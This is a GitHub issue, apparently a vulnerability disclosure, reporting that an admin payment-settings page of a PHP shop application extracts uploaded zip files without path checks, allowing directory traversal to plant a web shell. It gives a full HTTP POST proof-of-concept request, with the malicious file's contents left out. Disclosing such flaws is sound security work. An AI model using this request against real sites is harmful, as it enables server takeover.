Skip to content

Compressed file upload getshell #8

Open
@sviivyao

Description

@sviivyao

The cause of the vulnerability: When decompressing, the compressed files were not filtered and judged, which resulted in the possibility of uploading cross-directory zip files to getshell.
image

Vulnerability Recurrence:: Log in to the background and visit:/open/app/LKT/index.php?module=system&action=pay To upload a compressed file, put the malicious file that can be traversed into a zip, upload and decompress it.

image
image
Then access the path of the malicious file:
image
poc:

POST /open/app/LKT/index.php?module=system&action=pay HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------22809827021874544672920013866
Content-Length: 959
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/open/app/LKT/index.php?module=system&action=pay
Cookie: bdshare_firstime=1609743336438; ECS[visit_times]=4; admin_mojavi=0kbneeltri2qm0ropn901mvb61
Upgrade-Insecure-Requests: 1

-----------------------------22809827021874544672920013866
Content-Disposition: form-data; name="mch_id"

0
-----------------------------22809827021874544672920013866
Content-Disposition: form-data; name="mch_key"

111
-----------------------------22809827021874544672920013866
Content-Disposition: form-data; name="upload_cert"; filename="debug.zip"
Content-Type: application/x-zip-compressed

//upload file
-----------------------------22809827021874544672920013866
Content-Disposition: form-data; name="mch_cert"

http://127.0.0.1/open/app/LKT/webapp/lib/cert
-----------------------------22809827021874544672920013866
Content-Disposition: form-data; name="Submit"


-----------------------------22809827021874544672920013866--

Upload was successful and executed successfully!

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions